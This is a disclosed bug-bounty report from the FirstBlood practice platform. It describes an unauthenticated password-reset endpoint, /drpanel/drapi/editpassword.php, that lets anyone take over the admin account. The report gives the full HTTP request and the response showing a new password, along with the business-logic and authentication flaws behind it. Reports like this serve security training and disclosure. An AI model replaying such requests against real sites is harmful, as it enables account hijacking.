FirstBlood-#519 — Account takeover via /drpanel/drapi/editpassword.php
This issue was discovered on FirstBlood v2
On 2021-10-26, 0x1452 Level 3 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hey!
Summary
The HTML source of /drpanel/index.php contains the following code in a comment:
function editpassword(username) {
var xhr = new XMLHttpRequest();
xhr.open("POST", '', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
alert(this.responseText);
} else {
}
}
xhr.send();
}
I found that there's an endpoint called /drpanel/drapi/editpassword.php that lets you reset anyone's password. The user doesn't have to be logged in at all to do this.
To reproduce this simply send a POST request to /drpanel/drapi/editpassword.php with the body username=:username.
Taking over the admin account:
Note that there are no session cookies set!
POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: b6a5124dc2a4-0x1452.a.firstbloodhackers.com
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://b6a5124dc2a4-0x1452.a.firstbloodhackers.com/login.php?action=login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
username=drAdmin
Example response:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Oct 2021 02:11:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34
Password updated - RxJPi2qpNyjYQnc
The attacker can now log into the admin account drAdmin using the new password.
Impact
An attacker can take over any account they know the username of.
P1 CRITICAL
Endpoint: /drpanel/drapi/editpassword.php
This report contains multiple vulnerabilities:
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
FirstBlood ID: 28
Vulnerability Type: Auth issues
The endpoint /drapi/editpassword can actually be accessed unauthenticated.